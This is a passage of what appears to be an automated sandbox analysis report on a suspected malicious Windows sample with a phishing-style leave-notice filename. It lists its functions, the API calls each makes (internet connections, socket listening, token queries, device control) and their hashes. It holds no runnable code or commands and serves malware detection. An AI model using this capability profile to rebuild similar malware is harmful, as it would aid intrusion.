                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 78a3ad5e521b404820508eb0950a511ac8590f8ca6875ae591f89512fc22a616
                                                      • Instruction ID: 1c13843e7a7e94e47d50c6db52cef92e415025adf65292be56bfc9a8eec29cf2
                                                      • Opcode Fuzzy Hash: 78a3ad5e521b404820508eb0950a511ac8590f8ca6875ae591f89512fc22a616
                                                      • Instruction Fuzzy Hash: 6B21F339A00018EFDB268F95C888EFE7BB5FF49320F044069FA05872A5D3369D50EB60
                                                      Function 00FD431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FD4358
                                                        • Part of subcall function 00FD43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FD4401
                                                        • Part of subcall function 00FD43E2: InternetCloseHandle.WININET(00000000), ref: 00FD449E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: a8223574ee3a2c9f53cdbe6555d18a2b3f16c497b955e7dceae3265b9a2bc811
                                                      • Instruction ID: b57ae8fa209dda823726b4d7561d7b66e825aa228c1be2427796143ae23faed9
                                                      • Opcode Fuzzy Hash: a8223574ee3a2c9f53cdbe6555d18a2b3f16c497b955e7dceae3265b9a2bc811
                                                      • Instruction Fuzzy Hash: 1021A432600605BBDB129FA49C04F7BB7AAFF44710F18401BFA5597740DB76A821B7A0
                                                      Function 00FD8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00FD8AE0
                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00FD8AF2
                                                      • accept.WSOCK32(00000000,00000000,00000000), ref: 00FD8AFF
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00FD8B16
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastacceptselect
                                                      • String ID:
                                                      • API String ID: 385091864-0
                                                      • Opcode ID: f0ea306507568f210609ff6be9adea092540cf51aa20b9057bdb020d9fe8fe6a
                                                      • Instruction ID: bab7ca53ee0d9e5afff98a741eb3d357518206789637ec0d26564df8afeb8044
                                                      • Opcode Fuzzy Hash: f0ea306507568f210609ff6be9adea092540cf51aa20b9057bdb020d9fe8fe6a
                                                      • Instruction Fuzzy Hash: 12216672A001249FC7219FA9CC85A9E7BFDEF49360F04416AF849D7381DB78D9419FA0
                                                      Function 00FE8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FE8AA6
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FE8AC0
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FE8ACE
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FE8ADC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: 42217c2a709e3946b7671fde0c614eee96b14f90dfe72440a1751fe3cbd60934
                                                      • Instruction ID: 1730e62a22e0f94a2f519325d695d56e55131c5364ed7719a0549a465e8e536e
                                                      • Opcode Fuzzy Hash: 42217c2a709e3946b7671fde0c614eee96b14f90dfe72440a1751fe3cbd60934
                                                      • Instruction Fuzzy Hash: 5611D031305111BFDB15BB58CC05FBA7799BF85760F154129F82AC72E2CF68AC0197A0
                                                      Function 00FC0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FC1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FC0ABB,?,?,?,00FC187A,00000000,000000EF,00000119,?,?), ref: 00FC1E77
                                                        • Part of subcall function 00FC1E68: lstrcpyW.KERNEL32(00000000,?,?,00FC0ABB,?,?,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC1E9D
                                                        • Part of subcall function 00FC1E68: lstrcmpiW.KERNEL32(00000000,?,00FC0ABB,?,?,?,00FC187A,00000000,000000EF,00000119,?,?), ref: 00FC1ECE
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC0AD4
                                                      • lstrcpyW.KERNEL32(00000000,?,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC0AFA
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FC187A,00000000,000000EF,00000119,?,?,00000000), ref: 00FC0B2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 099a989b82e1f2f8a9ee2bc87b6fcbccd040f8615c423f91ba47c57b0a769a55
                                                      • Instruction ID: b5e636648d263b0be217640210620f9d83b41ec0ebfcce488be2d6e3be4579ba
                                                      • Opcode Fuzzy Hash: 099a989b82e1f2f8a9ee2bc87b6fcbccd040f8615c423f91ba47c57b0a769a55
                                                      • Instruction Fuzzy Hash: 2C11B436500306EFDB259F64DC06E7A77A8FF85324B80402EE806CB255EF719851E7A0
                                                      Function 00FB2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00FB2FB5
                                                        • Part of subcall function 00FA395C: __FF_MSGBANNER.LIBCMT ref: 00FA3973
                                                        • Part of subcall function 00FA395C: __NMSG_WRITE.LIBCMT ref: 00FA397A
                                                        • Part of subcall function 00FA395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,00F9F507,?,0000000E), ref: 00FA399F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 588465b3a8cb539542e7c5877f4680e9eb1ccc2c408205ecd5bcb9ee3858942e
                                                      • Instruction ID: 972f4d23271f509be49ee2a75803710376307b1ac388ee508c7b6a1b8dc307d8
                                                      • Opcode Fuzzy Hash: 588465b3a8cb539542e7c5877f4680e9eb1ccc2c408205ecd5bcb9ee3858942e
                                                      • Instruction Fuzzy Hash: A3110A72949315ABCB313BB5BC44BEA3B94AF053B4F204425F84996145DB39CD40BF90
                                                      Function 00FC058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FC05AC
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FC05C7
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FC05DD
                                                      • FreeLibrary.KERNEL32(?), ref: 00FC0632
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                      • String ID:
                                                      • API String ID: 3137044355-0
                                                      • Opcode ID: c5d77ebf4bf9ff448fcfe76a6db207ea9cecb906fe5bfb555ff119472e4899ff
                                                      • Instruction ID: cf7a39a1760420fb3607ad94290fa9f4b61706ae373775b3474ab2d129a41244
                                                      • Opcode Fuzzy Hash: c5d77ebf4bf9ff448fcfe76a6db207ea9cecb906fe5bfb555ff119472e4899ff
                                                      • Instruction Fuzzy Hash: 58215E7190020AEBDB21CFD1D989FDABBB8EB40700F00846DA55692040DF75EA56BB60
                                                      Function 00FC6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00FC6733
                                                      • _memset.LIBCMT ref: 00FC6754
                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00FC67A6
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FC67AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                      • String ID:
                                                      • API String ID: 1157408455-0
                                                      • Opcode ID: 3592782529bfc12e6507dbd2e9f48e4b3ca99a169e65ac5b0f4c867d4801b629
                                                      • Instruction ID: 8511494896989ba885b4e38d2401f2dd577944f6958f1bd2ef0b8bb3e6f81259
                                                      • Opcode Fuzzy Hash: 3592782529bfc12e6507dbd2e9f48e4b3ca99a169e65ac5b0f4c867d4801b629
                                                      • Instruction Fuzzy Hash: A711A3B69012287AE7309BA5AC4DFABBABCEF44764F10459AF504E7180D6745E808BB4
                                                      Function 00FBB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FBAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FBAA79
                                                        • Part of subcall function 00FBAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FBAA83
                                                        • Part of subcall function 00FBAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FBAA92
                                                        • Part of subcall function 00FBAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FBAA99
                                                        • Part of subcall function 00FBAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FBAAAF
                                                      • GetLengthSid.ADVAPI32(?,00000000,00FBADE4,?,?), ref: 00FBB21B
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FBB227
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FBB22E
                                                      • CopySid.ADVAPI32(?,00000000,?), ref: 00FBB247
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                      • String ID:
                                                      • API String ID: 4217664535-0
                                                      • Opcode ID: 315dfbfe61a9a2b1873958229a57ad95c7de9fdef654d53ff20be0883edf74f3
                                                      • Instruction ID: 2a0c415ea8532fdabd4d86c0f87d5dee30695da05549db8cf3ab8c4645ee79a7
                                                      • Opcode Fuzzy Hash: 315dfbfe61a9a2b1873958229a57ad95c7de9fdef654d53ff20be0883edf74f3
                                                      • Instruction Fuzzy Hash: 9A119E71A00205FFDB169F99DC85AEEB7A9EF85314F14802DE982D7204D776AE44EF20
                                                      Function 00FBB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FBB498
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FBB4AA
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FBB4C0
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FBB4DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 6b58114f228b28fc33d541b4faa2fc2f799432c206a5e9afcfffe5263194064f
                                                      • Instruction ID: 779d174709bc52010d8613ba13b1ed6a456b2e7d79fc9a9b5c3b358af22fc66b
                                                      • Opcode Fuzzy Hash: 6b58114f228b28fc33d541b4faa2fc2f799432c206a5e9afcfffe5263194064f
                                                      • Instruction Fuzzy Hash: F511187A900218FFDB11DFA9C985EDDBBB4FB08710F204091E604B7295D771AE11EB94
                                                      Function 00F9B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00F9B5A5
                                                      • GetClientRect.USER32(?,?), ref: 00FFE69A
                                                      • GetCursorPos.USER32(?), ref: 00FFE6A4
                                                      • ScreenToClient.USER32(?,?), ref: 00FFE6AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: 2631d52622836c8245ba8d251c34e5afef5994ffbf2411317b2fbecd7f73115a
                                                      • Instruction ID: e022ea5b635c37ff842bb98037c429b994d640f06c00a1aa9b1cc8915fe03109
                                                      • Opcode Fuzzy Hash: 2631d52622836c8245ba8d251c34e5afef5994ffbf2411317b2fbecd7f73115a
                                                      • Instruction Fuzzy Hash: 4511367290002ABBDF10EF98ED859AE77B9EF08305F450451EA41E7144D739AA81EBA5
                                                      Function 00FC732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00FC7352
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00FC7385
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FC739B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FC73A2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      • Opcode ID: cbd24606f6537559f2452f0bd56bb170251f7a89e2d6ceead44513b69975eb39
                                                      • Instruction ID: a5f76ff8710e073e3ddcd7a78db1a3a64aef9c2dffc67bc1b04164601b834fb9
                                                      • Opcode Fuzzy Hash: cbd24606f6537559f2452f0bd56bb170251f7a89e2d6ceead44513b69975eb39
                                                      • Instruction Fuzzy Hash: 0C11E5B6A04255BBC7129BE89E46F9E7BB9AB45320F044319F861D3245D6758900ABB0
                                                      Function 00F9D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                      • GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      • Opcode ID: 9bcd838b238568fdac38d754af366e42ae6ce4132e6d7fed087d637d86a9d0de
                                                      • Instruction ID: 269324003dfe0618cd5f46f950cbffa7c926cd5913a9a63786a3ee54cb6c59d2
                                                      • Opcode Fuzzy Hash: 9bcd838b238568fdac38d754af366e42ae6ce4132e6d7fed087d637d86a9d0de
                                                      • Instruction Fuzzy Hash: 9711A9B3501549BFFF224FE09C50EEABB69FF08368F140102FA5552050D736DCA0ABA0
                                                      Function 00FB4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                      • Instruction ID: 7a66745c8082afbba479e04db5999d79b4feba3055f7ebc9fa561de4018ee413
                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                      • Instruction Fuzzy Hash: FC014B3640014ABBCF125F85DD118EE3F63BB18764B588455FA2859132D33AEAB1BF85
                                                      Function 00FA7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FA7A0D: __getptd_noexit.LIBCMT ref: 00FA7A0E
                                                      • __lock.LIBCMT ref: 00FA748F
                                                      • InterlockedDecrement.KERNEL32(?), ref: 00FA74AC
                                                      • _free.LIBCMT ref: 00FA74BF
                                                      • InterlockedIncrement.KERNEL32(018528C8), ref: 00FA74D7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                      • String ID:
                                                      • API String ID: 2704283638-0
                                                      • Opcode ID: b6197c47b5424f647744abccb3ee31cd77b5cf515176149a652d8599b1b3c811
                                                      • Instruction ID: 6ae47650c991f48161275cc21a6c95526c3c56721bc44ee987c14e5e4fede439
                                                      • Opcode Fuzzy Hash: b6197c47b5424f647744abccb3ee31cd77b5cf515176149a652d8599b1b3c811
                                                      • Instruction Fuzzy Hash: 9301A1B2E09B11EBC722FF649C05B5DBB64BB0A721F158009F894E7680C7686901EFD1
                                                      Function 00FA7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __lock.LIBCMT ref: 00FA7AD8
                                                        • Part of subcall function 00FA7CF4: __mtinitlocknum.LIBCMT ref: 00FA7D06
                                                        • Part of subcall function 00FA7CF4: EnterCriticalSection.KERNEL32(00000000,?,00FA7ADD,0000000D), ref: 00FA7D1F
